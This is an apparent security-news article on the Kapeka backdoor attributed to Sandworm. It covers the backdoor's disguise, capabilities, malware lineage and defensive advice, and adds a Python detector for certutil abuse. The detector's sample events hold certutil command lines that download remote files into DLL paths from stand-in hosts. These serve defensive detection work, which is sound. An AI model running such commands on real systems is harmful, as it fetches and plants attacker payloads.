
Kapeka: the new cyber threat from Russia

Discovering and analyzing a new global cybersecurity challenge

The Kapeka backdoor, identified by WithSecure, is a Windows threat attributed to the Sandworm group. It disguises itself as a Word add-in and carries out malicious operations under remote control.

This pill is also available in Italian.

Recently discovered by the Finnish company WithSecure, the Kapeka backdoor, tracked by Microsoft as KnuckleTouch, targets Windows operating systems. The threat is linked to the Russian-affiliated Sandworm APT group and has been seen mainly in Eastern Europe, with attacks recorded in Estonia and Ukraine since mid-2022. Kapeka is notable for its versatility: it can serve both as an early-stage toolkit in a cyber-attack and as a long-term remote-access implant on victims' assets.

Technical details and use of Kapeka in cyber attacks

The Kapeka backdoor is implemented as a Windows DLL written in C++ with advanced command and control (C2) functionality. To evade detection, the module masquerades as a Microsoft Word add-in; it runs multi-threaded so that it can handle commands from the C2 server efficiently. Its capabilities include reading and writing files, executing shell commands, and managing itself by updating or uninstalling on command, which increases its stealth and its usefulness in cyber-espionage operations or ransomware distribution.

Relationships between Kapeka and other malware families

WithSecure highlighted links between Kapeka and other well-known malware families such as GreyEnergy and BlackEnergy, suggesting an evolution of Sandworm's toolset. It also observed overlaps in attack techniques between Kapeka and recent ransomware campaigns, such as Prestige. Together these associations indicate that Sandworm's arsenal is continually evolving, with existing tools refined and new ones developed to make attacks more effective.

Tips for protecting against the Kapeka threat

Microsoft has observed "living-off-the-land" techniques in these intrusions, such as using the built-in certutil utility to download the dropper from compromised websites, which underlines the importance of a proactive cybersecurity strategy. It is essential to keep systems updated and to review code and configurations regularly. Promoting security awareness within organizations is crucial to reducing the risk of infection by malware like Kapeka and to protecting sensitive data and critical infrastructure.
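The certutil abuse described above is something a defender can look for in process-creation telemetry. The following is an added example, not code from the article, from WithSecure or from Microsoft: it takes constructed Sysmon-style process-creation records (image path, parent image, command line; the sample values, hostnames and paths are made up) and flags certutil invocations that fetch a remote URL. It goes slightly beyond the text by also covering the -verifyctl verb, which can download in the same way as -urlcache, and it deliberately ignores benign uses such as listing the URL cache or running a -verify chain check.

```python
import re
from typing import Dict, List, Optional

# Constructed process-creation records in the shape of Sysmon Event ID 1 /
# Windows 4688 fields. Sample telemetry only; nothing here comes from a real host.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://compromised-site.example/update.bin C:\Users\Public\addin.dll"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'CERTUTIL -UrlCache -f "https://203.0.113.10/x" %TEMP%\x.dll'},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil -urlcache *"},                 # lists the local cache: benign
    {"Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\System32\mmc.exe",
     "CommandLine": r"certutil -verify -urlfetch server.cer"},  # certificate chain check: benign
    {"Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n'},
]

# certutil verbs that will write remote content to disk when given a URL.
DOWNLOAD_VERBS = {"-urlcache", "-verifyctl"}
URL_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)


def tokenize(cmdline: str) -> List[str]:
    """Split a Windows command line on whitespace, keeping quoted arguments whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def classify(event: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Return a finding when certutil is used to fetch a remote URL, else None."""
    image = event.get("Image", "")
    exe = image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if exe != "certutil.exe":
        return None

    tokens = tokenize(event.get("CommandLine", ""))
    # certutil accepts both -verb and /verb spellings, in any letter case.
    verbs = {"-" + t[1:].lower() for t in tokens if t[:1] in ("-", "/")}
    if not verbs & DOWNLOAD_VERBS:
        return None

    urls = [t for t in tokens if URL_RE.match(t)]
    if not urls:
        return None   # e.g. "certutil -urlcache *" only lists the cache

    # certutil writes the fetched object to the last positional argument when present.
    dest = tokens[-1] if tokens[-1] != urls[-1] else None
    return {
        "url": urls[0],
        "destination": dest,
        "forced": "-f" in verbs,   # -f forces a fresh fetch instead of using the cache
        "parent": event.get("ParentImage", ""),
    }


def scan(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run classify() over a batch of process-creation records."""
    return [f for f in (classify(e) for e in events) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"certutil download from {finding['url']} -> {finding['destination']} "
              f"(parent: {finding['parent']}, forced={finding['forced']})")
```

The rule keys on the combination of a download-capable verb and a remote URL rather than on the presence of certutil alone, because certutil is routinely run by legitimate administration tooling; the parent process and the destination path are carried along so an analyst can triage quickly.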


04/23/2024 18:26

Editorial AI
